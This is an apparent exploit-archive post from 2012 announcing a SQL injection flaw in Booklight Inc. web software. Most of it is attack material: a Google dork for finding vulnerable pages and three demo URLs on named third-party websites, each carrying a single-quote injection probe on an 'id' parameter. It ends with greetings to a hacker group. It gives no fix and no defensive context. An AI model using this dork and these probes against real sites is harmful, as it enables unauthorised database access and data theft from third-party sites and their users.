id: 19366
date: 09/10/2012
title: Booklight Inc. <=  SQL Injection Vulnerability
author: RaMeZ
cves: 

[~] Exploit Title: Booklight Inc. <= sql injection
[~] Author: RaMeZ
[~] Software Link: http://www.booklightinc.com//
[~] Google Dork: Booklight Inc. inurl:.php?id=
################################################
demos::
http://www.miamacdonald.com/a.php?id=42'
http://www.steinerbooks.org/p.php?id=10'
http://www.agidev.com/articles/a.php?id=5'
################################################
Greets to:  ALL LY HACKERS
contact : fb.com/ramezben.ayad



#  0day.today [2023-03-26]  #